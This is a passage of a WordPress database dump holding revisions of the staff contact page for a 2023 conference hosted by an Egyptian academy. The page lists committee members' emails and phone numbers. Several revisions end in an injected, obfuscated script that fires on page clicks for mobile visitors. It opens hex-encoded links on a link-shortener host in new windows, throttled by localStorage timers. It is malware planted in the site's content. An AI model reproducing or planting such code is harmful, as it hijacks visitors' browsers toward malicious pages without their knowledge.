_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-28 09:39:02','2023-06-28 09:39:02','',4849,'https://gsw2023.com/?p=4955',0,'revision','',0),
(4956,4,'2023-06-28 09:40:52','2023-06-28 09:40:52','<p>[vc_row css=\".vc_custom_1687871707649{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1687871751542{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871759816{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Chairman</strong></span></h3>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span><br />\r\nVice President for Post Graduate and Scientific Research<br />\r\nArab Academy for Science, Technology and Maritime Transport<br />\r\nP.O.Box 1029, Alexandria, Egypt</p>\r\n<table style=\"margin: 0px; padding: 0px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\r\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></td>\r\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@gsw2023.com\"> aaelbary@gsw2023.com </a></td>\r\n<td style=\"width: 26%;\"><a href=\"mailto:gsw2023@aast.edu\"> gsw2023@aast.edu </a></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\r\n<td style=\"width: 26%;\">Office: <a href=\"tel:+2035497598\">+203 5497598</a></td>\r\n<td style=\"width: 26%;\">Fax: +203 5497598</td>\r\n<td style=\"width: 26%;\">Mobile: +20 100 7382 198</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871606693{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1687943626436{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687945134205{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]</p>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span><br />\r\n<span style=\"font-size: 9pt;\"><a href=\"mailto:nashwa.elbendary@aast.edu\"> nashwa.elbendary@aast.edu </a></span><br />\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201227217550\">+201227217550 </a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]</p>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span><br />\r\n<span style=\"font-size: 12pt;\">ymohasseb@aast.edu</span><br />\r\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]</p>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/amira_ibrahim_zaki.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span><br />\r\n<span style=\"font-size: 12pt;\">amzak10@aast.edu</span><br />\r\n<span style=\"font-size: 12pt;\">+201006619608</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]</p>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/radwa_ahmed_osman.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span><br />\r\n<span style=\"font-size: 12pt;\">radwa.ahmed@aast.edu</span><br />\r\n<span style=\"font-size: 12pt;\">+201001552854</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>[/vc_column_text][/vc_column][vc_column css=\".vc_custom_1687871596223{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871574136{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>IT Support</strong></span></h3>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687871425647{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687944895884{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]</p>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/avatar.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ayman Elzagh</strong></em></span><br />\r\n<span style=\"font-size: 12pt;\">Local Web director<br />\r\nGSW2023, Egypt<br />\r\n<span style=\"font-size: 11pt;\">ay.zagh@gmail.com</span><br />\r\n<span style=\"font-size: 12pt;\">+201210007979</span></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}\"][vc_column_text css=\".vc_custom_1687944881119{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]</p>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/avatar.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ahmed ElGamal </strong></em></span><br />\r\n<span style=\"font-size: 12pt;\">gamal97@gmail.com </span><br />\r\n<span style=\"font-size: 12pt;\">+201001610401</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}\" el_class=\"gsw-no-border\"][vc_column_text css=\".vc_custom_1687871454148{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}\" el_class=\"gsw-no-border\"]</p>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/nagy.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Nagy K. Aly</strong></em></span><br />\r\n<span style=\"font-size: 12pt;\">nagy@aast.edu</span><br />\r\n<span style=\"font-size: 12pt;\">+201141606029</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column css=\".vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_text css=\".vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 12pt;\">Arab Academy for Science &amp; Technology &amp; Maritime Transport</span></strong><br />\r\n<strong><span style=\"font-size: 12pt;\">P.O.Box: 1029 Alexandria Egypt</span></strong>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687872978322{margin-bottom: 10px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687872285543{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Hotels Reservation and Public Relations</strong></span></h3>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4936\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Yasser Elrashidi</strong></em></span><br />\r\nDirector of Events and conferences Department<br />\r\nArab Academy for Science, Technology and Maritime Transport<br />\r\nP.O.Box 1029, Alexandria, Egypt</p>\r\n<table>\r\n<tr>\r\n<td>Email:</td>\r\n<td>yasserelrashidi@aast.edu</td>\r\n</tr>\r\n<tr>\r\n<td>Mobile:</td>\r\n<td>+201270059999</td>\r\n</tr>\r\n</table>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687873543921{margin-bottom: 10px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687873078553{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Financial Affairs</strong></span></h3>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4939\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Mohamed Abdallah Mahmoud </strong></em></span><br />\r\nLocal financial Director, GSW2023, Egypt<br />\r\nArab Academy for Science, Technology and Maritime Transport<br />\r\nP.O.Box 1029, Alexandria, Egypt</p>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td>Email:</td>\r\n<td>mohamed_abdallah20102002@yahoo.com</td>\r\n</tr>\r\n<tr>\r\n<td>Mobile:</td>\r\n<td>+201141401861</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-28 09:40:52','2023-06-28 09:40:52','',4849,'https://gsw2023.com/?p=4956',0,'revision','',0),
(4957,4,'2023-06-28 09:42:50','2023-06-28 09:42:50','<p>[vc_row css=\".vc_custom_1687871707649{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1687871751542{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871759816{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Chairman</strong></span></h3>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span><br />\r\nVice President for Post Graduate and Scientific Research<br />\r\nArab Academy for Science, Technology and Maritime Transport<br />\r\nP.O.Box 1029, Alexandria, Egypt</p>\r\n<table style=\"margin: 0px; padding: 0px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\r\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></td>\r\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@gsw2023.com\"> aaelbary@gsw2023.com </a></td>\r\n<td style=\"width: 26%;\"><a href=\"mailto:gsw2023@aast.edu\"> gsw2023@aast.edu </a></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\r\n<td style=\"width: 26%;\">Office: <a href=\"tel:+2035497598\">+203 5497598</a></td>\r\n<td style=\"width: 26%;\">Fax: <a href=\"tel:+2035497598\"> +203 5497598 </a></td>\r\n<td style=\"width: 26%;\">Mobile: <a href=\"tel:+201007382198\"> +20 100 7382 198 </a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871606693{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1687943626436{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687945134205{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]</p>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span><br />\r\n<span style=\"font-size: 9pt;\"><a href=\"mailto:nashwa.elbendary@aast.edu\"> nashwa.elbendary@aast.edu </a></span><br />\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201227217550\">+201227217550 </a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]</p>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span><br />\r\n<span style=\"font-size: 12pt;\"><a href=\"mailto:ymohasseb@aast.edu\"> ymohasseb@aast.edu </a></span><br />\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201227217550\">+ 201227217550 </a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text 